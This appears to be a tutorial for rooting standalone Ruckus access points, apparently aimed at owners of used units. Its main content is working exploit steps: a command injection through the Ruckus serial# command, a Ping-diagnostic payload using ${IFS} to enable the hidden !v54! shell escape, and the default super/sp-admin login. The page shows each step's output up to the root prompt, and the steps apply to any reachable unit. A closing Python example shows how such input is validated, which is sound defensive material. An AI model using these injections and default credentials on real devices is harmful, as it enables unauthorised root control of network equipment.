Obtaining a root shell on Standalone/Solo Ruckus APs

The Ruckus CLI includes a hidden !v54! command which exits to a root shell.

  • Very old AP firmware checks a configuration setting cli_esc2shell_ok to decide whether the !v54! command is available.
  • Newer AP firmware checks an encrypted serial# to decide whether the !v54! command is available.
    The encrypted serial# is saved to a file using the Ruckus command, then the !v54! command uses sesame to decrypt this file.

NOTE

If you bought a used Ruckus AP then it is very likely to be running SmartZone or ZoneDirector firmware.

You can try the Firmware 9.8 - 112.0 steps, below, to see if they work. Otherwise you'll need to install Solo or Unleashed firmware.

Firmware 3.x, 5.x, 6.x, 9.9 - 9.13, 10.x

Your AP is running SmartZone or ZoneDirector firmware rather than Solo firmware.

You can try the Firmware 9.8 - 112.0 steps, below, to see if they work.

Otherwise you'll need to install Solo or Unleashed firmware (see the next section).

Firmware released after November 2019 (e.g. >112.0)

Sorry, I don't have a method to bypass the serial# check on newer Standalone/Solo AP firmwares.

If your AP was released before mid-2019 then you can downgrade to an older Solo firmware.

Alternatively, if your AP has Unleashed firmware available then you can install and use this to obtain a root shell.

For the R730, you can download the ZoneDirector 10.1.2.0.120 Software Release, extract and install the R730 firmware, then follow the Firmware 9.8 - 112.0 steps, below.

This tool will extract the R730 AP Image from the ZoneDirector Software Image:-

Manual Extraction Steps

Decrypt the image, then use an archive tool like 7-Zip to extract the firmwares/ap-patch/patch000/ap-arm-11ax/10.1.2.0.120/rcks_fw.bl7.main AP image file.

Firmware 9.8 - 112.0 (excl. 110.0.0.0.2005)

These AP firmware versions don't sanitize the encrypted serial#.
So we can use the Ruckus command to inject a root shell.

TIP

The injection only needs to be performed once.

SSH to the AP

```console
$ ssh 192.168.0.1 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes256-cbc
```

Login. Default username is "super", password is "sp-admin".

Command injection

```console
rkscli: Ruckus
```

Now type ";/bin/sh;" including the quotes and hit enter (you won't be able to see what you're typing).

```console
grrrr
```

TIP

Instead of grrrr, another dog noise could be printed to the screen.

Escape to shell

```console
rkscli: !v54!
What's your chow:
```

Now hit enter.

```console
BusyBox v1.15.2 (2015-07-21 22:07:19 PDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

#
```

You have a root shell.

TIP

If you don't see a BusyBox shell prompt, and instead see just the rkscli: prompt, then the injection hasn't worked.
Repeat the command injection step, ensuring you type ";/bin/sh;" including the quotes.

Firmware Pre-9.8

These AP firmware versions don't sanitize the input to the Ping diagnostic tool.
So we can use Ping to enable cli_esc2shell_ok.

TIP

The Ping enablement only needs to be performed once.

Connect to the AP's Web UI

Login. Default username is "super", password is "sp-admin".

Enable shell escape

Go to Administration > Diagnostics, paste |rpm${IFS}-p${IFS}cli_esc2shell_ok="t" into the Ping: textbox and hit Run test.

SSH to the AP

```console
$ ssh 192.168.0.1 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes256-cbc
```

Login. Default username is "super", password is "sp-admin".

Escape to shell

```console
rkscli: !v54!
What's your chow:
```

Now hit enter.

```console
BusyBox v1.15.2 (2015-07-21 22:07:19 PDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

#
```

You have a root shell.

TIP

If you don't see a BusyBox shell prompt, and instead see just the rkscli: prompt, then the injection hasn't worked.
If your firmware version isn't 9.x then it's very likely your AP is running SmartZone or Cloud firmware rather than Solo firmware.
Read the information in the Firmware 3.x, 5.x, 6.x, 9.9 - 9.13, 10.x section.
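Both techniques on this page (the Ruckus serial# command and the Ping diagnostic) work for the same reason: user-supplied text reaches a shell unsanitized, and the ${IFS} trick shows why merely filtering spaces is not a fix. The following is an added illustration, not Ruckus code (the AP's real handlers are not public): a hypothetical Python ping handler written in the injectable string-building style beside a hardened version that allow-lists the target and executes without a shell, so both of the page's payloads are rejected before any command runs.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: alphanumeric labels joined by dots, hyphens only inside labels.
# Nothing a shell treats specially (| ; $ { } " space) can match this pattern.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_ping_command(target: str) -> str:
    """Hypothetical handler in the bug-prone style: user text is glued into a
    shell command line. Rejecting literal spaces is not a defence, because the
    shell expands ${IFS} to whitespace and '|' or ';' still start a new command.
    The string is returned for inspection only and is never executed here."""
    if " " in target:
        raise ValueError("spaces are not allowed")
    return "ping -c 3 " + target


def validate_ping_target(target: str) -> str:
    """Allow-list validation: accept only an IP literal or an RFC 1123 hostname."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOST_RE.match(target):
        return target
    raise ValueError(f"invalid ping target: {target!r}")


def is_safe_target(target: str) -> bool:
    """Boolean wrapper around validate_ping_target, handy for bulk checks."""
    try:
        validate_ping_target(target)
        return True
    except ValueError:
        return False


def hardened_ping_argv(target: str) -> list:
    """Build an argv list: with shell=False no shell ever parses the target, and
    validation guarantees it cannot start with '-' (no option smuggling)."""
    return ["ping", "-c", "3", validate_ping_target(target)]


def run_ping(target: str) -> subprocess.CompletedProcess:
    """Run the diagnostic without a shell; bad input raises before anything executes."""
    return subprocess.run(hardened_ping_argv(target), capture_output=True,
                          text=True, timeout=15, check=False)
```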

Released under the BSD Zero Clause License.